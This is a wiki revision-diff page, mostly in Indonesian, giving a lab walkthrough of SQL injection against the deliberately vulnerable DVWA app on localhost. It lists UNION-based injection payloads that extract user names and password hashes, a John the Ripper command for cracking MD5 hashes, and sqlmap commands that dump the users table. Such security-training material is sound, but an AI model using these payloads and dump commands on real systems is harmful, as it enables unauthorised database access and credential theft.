Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
Jump to navigation Jump to search
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
DVWA-BLIND SQL INJECTION : LOW Level
 
DVWA-BLIND SQL INJECTION : LOW Level
  
1. Open Local host  http://localhost/dvwa
+
* Buka DVWA, misalnya http://localhost/DVWA-1.9
  
 
  Username :  Admin
 
  Username :  Admin
 
  Password : Password
 
  Password : Password
  
3.Select SQL Injection BLIND and  column ID issued
+
* Pilih SQL Injection BLIND dan dalam kolom ID masukan
  
 
  1' and 1=1#
 
  1' and 1=1#
 
  1' and 1=1 order by 2 #
 
  1' and 1=1 order by 2 #
 +
ID: 'or' 1=1--
  
5.ID: 'or' 1=1--
+
Kita akan lihat ada 5 user
  
we can see there are 5 user
+
* Melihat informasi table
 
 
5. now see information table
 
  
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 
  1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
 
  1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
  
7. Information table name from table user
+
* Melihat informasi table name dari table user
  
 
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
 
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
  
8. on the last lets see  user name and password
+
* Terakhir lihat username dan password
  
 
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
 
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  
9. we will crack the md5 password
+
* Crack md5 password
 
 
copy the passowrd into kwrite and save with name hash
 
next
 
 
 
  
  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash  
+
  copy hasil password hash yang diperoleh, save misalnya dengan nama hash
  
 +
Lakukan
  
OK GOOD LUCK
+
  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
  
Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.
 
  
1. afer login in DVWA and choose DVWA Securty Low
+
==Exploit DVWA menggunakan SQLmap==
2. follow this picture
 
  
In User ID write '1
+
* Login ke DVWA
 +
* Pilih DVWA Security Low
 +
* Pada user ID tulis '1
 +
* Jalankan addon tamer di browser
 +
* Lakukan di terminal,
  
than show
+
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
 
Lakukan di terminal,
 
 
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
 
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
  
 
  --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
 
  --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
Line 57: Line 50:
 
di peroleh dari addon tamer di browser.
 
di peroleh dari addon tamer di browser.
  
lihat tables
+
* lihat tables
 
 
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
 
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
 
 
 
lihat kolom di user tabel
 
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
+
* lihat kolom di user tabel
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
  
lihat field password & dump
+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
+
* lihat field password & dump
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
  
 
==Referensi==
 
==Referensi==
  
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

Latest revision as of 07:51, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level 

Username :  Admin
Password : Password
  • Pilih SQL Injection BLIND dan dalam kolom ID masukan
1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

Kita akan lihat ada 5 user

  • Melihat informasi table
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
  • Melihat informasi table name dari table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
  • Terakhir lihat username dan password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  • Crack md5 password
copy hasil password hash yang diperoleh, save misalnya dengan nama hash

Lakukan 

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash


Exploit DVWA menggunakan SQLmap

  • Login ke DVWA
  • Pilih DVWA Security Low
  • Pada user ID tulis '1
  • Jalankan addon tamer di browser
  • Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

  • lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=DVWA:_SQLi_blind&oldid=47179"